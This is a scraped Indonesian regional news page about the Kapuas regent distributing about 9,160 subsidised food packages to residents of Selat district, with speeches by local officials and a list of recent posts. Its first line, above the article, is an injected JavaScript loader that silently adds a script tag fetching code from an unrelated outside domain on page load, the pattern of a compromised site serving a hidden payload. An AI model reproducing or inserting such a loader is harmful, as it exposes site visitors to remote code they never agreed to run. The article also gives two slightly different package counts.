(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Kapuas

Bupati Kapuas Serahkan 9.160 Paket Sembako Tebus Murah ke Warga Kecamatan Selat


KANALKALIMANTAN.COM, KUALA KAPUAS – Bupati Kapuas, Ir Ben Brahim S Bahat menyerahkan paket sembako dari Pemerintah Kabupaten Kapuas ke masyarakat kurang mampu untuk delapan kelurahan dan dua desa, Sabtu (10/12/2022).

Acara penyerahan paket sembako tebus murah secara simbolis tersebut berlangsung di halaman kantor Camat Selat, yang dihadiri Wakil Bupati Kapuas, Drs HM Nafiah Ibnor, Sekda Kapuas, Drs Septedy MSi, Lurah serta jajaran perangkat desa penerima paket sembako.

Ketua TP PKK Kabupaten Kapuas, Ary Egahni Ben Bahat yang juga Anggota Komisi III DPR RI Dapil Kalteng menyampaikan rasa syukur pandemi Covid-19 di Kabupaten Kapuas sudah melandai, dan dengan adanya semangat kebersamaan elemen masyarakat bersama pemerintah daerah, sehingga vaksinasi juga sudah bisa dikatakan hampir 100 persen dilaksanakan.

“Saya meapresiasi kepada Bupati Kapuas dan Wakil Bupati Kapuas, yang selalu bersemangat memimpin Kabupaten Kapuas, tidak pernah mengenal kata lelah dalam melayani masyarakat Kapuas,” sebutnya.

 

Baca juga : Disporapar HSU Gelar Festival Pop Singer ke-14

“Dan tidak lupa, saya menyampaikan di penghujung tahun 2022 ini, bagaimana bersama-sama kita semua menjaga keamanan dan kedamaian. Kita boleh berbeda-beda suku, agama, ras dan warna kulit, tetapi kita tetap satu,” ucap Ary Egahni.

“Kepada umat Nasrani, saya ucapkan selamat Hari Natal 2022, semoga kita semua diberikan kesehatan dihari yang bahagia ini,” katanya.

Sementara itu, Bupati Kapuas, Ir Ben Brahim S Bahat mengucapkan terima kasih kepada pihak yang telah sedia membantu Pemkab Kapuas dalam penyaluran paket sembako.

“Terima kasih kepada pemerintahan kecamatan, kelurahan, dan desa, yang sudah membantu program pemerintah, semoga memberikan manfaat besar bagi masyarakat yang kurang mampu akibat dampak Covid 19,” ungkap Bupati Ben Brahim.

Baca juga  : Pentas Banjarbaru Murdjani Festival Rusuh, Pemain Kuda Lumping Baku Hantam!

Bupati Kapuas juga mengatakan bahwa Pemerintah Kapuas menyalurkan paket sembako sebanyak 9.169 untuk wilayah Kecamatan Selat.

Dikatakannya, pemerintah daerah juga akan membebaskan lahan milik warga dan akan dibikin taman bermain juga taman kota. “Semoga harga tanah nantinya sesuai dengan anggaran Pemda,” ujarnya.

“Saya meminta pergunakan lahan kosong seperti terlihat di depan kantor-kantor masih banyak lahan kosong, tolong ditanami pepohonan maupun buah-buahan, anggap pohon itu keluarga kita. Dan juga kita bangga beberapa Menteri menyampaikan ketika masuk ke Kabupaten Kapuas, udaranya sejuk. Maka dari itu tanamlah pohon di lahan kosong dengan berjarak,” ucap Ben Brahim.

“Saya meminta kepada Camat beserta jajaran untuk selalu ke lapangan mencari kesusahan warga, apabila ditemukan warga sakit, segera antar ke rumah sakit,” pintanya.

“Saya juga mengucapkan terima kasih kepada Camat Selat, karena saya tahu Camat Selat ini tiap malam selalu keliling memantau keadaan warga di wilayah,” ujar Bupati Kapuas dua periode ini. (Kanalkalimantan.com/ags)

Reporter : ags
Editor : kk


Desy Arfianty

Recent Posts

Manis Cuan Pokmas Madu Kelulut Berkat Bersatu dari Program RT Mandiri

KANALKALIMANTAN.COM, BANJARBARU – Berawal dari temuan sarang kelulut di dalam pondasi rumah tinggal warga, muncul… Read More

1 jam ago

Nasdem-PKS Koalisi di Pilwali Banjarbaru, Darmawan Jaya Siap Tantang Petahana

KANALKALIMANTAN.COM, BANJARBARU - Nama Darmawan Jaya Setiawan menjadi orang pertama yang menyerahkan formulir pendaftaran penjaringan… Read More

3 jam ago

Kades Tumbang Mangkutup Apresiasi Kunjungan Pj Bupati Kapuas

KANALKALIMANTAN.COM, KUALA KAPUAS - Penjabat (Pj) Bupati Kapuas, Erlin Hardi bersama jajarannya menghadiri kegiatan silaturahmi… Read More

4 jam ago

Monte All Star Banjarmasin Juara Turnamen Paman Birin Trophy U-45 Puma Legend 2024

KANALKALIMANTAN.COM, BANJARBARU - Monte All Star dari Banjarmasin juara Turnamen Sepak Bola Paman Birin Trophy… Read More

5 jam ago

Pj Bupati Kapuas Erlin Hardi ke Desa Tumbang Mangkutup

KANALKALIMANTAN.COM, KUALA KAPUAS - Penjabat (Pj) Bupati Kapuas, Erlin Hardi bersilaturahmi dengan masyarakat Desa Tumbang… Read More

18 jam ago

Satgas TMMD Beri Penyuluhan Pertanian dan Perikanan di Desa Sungai Karias

KANALKALIMANTAN.COM, AMUNTAI - Setelah program non fisik sosialisasi PHBS (Perilaku Hidup bersih Sehat) dan masalah… Read More

18 jam ago

This website uses cookies.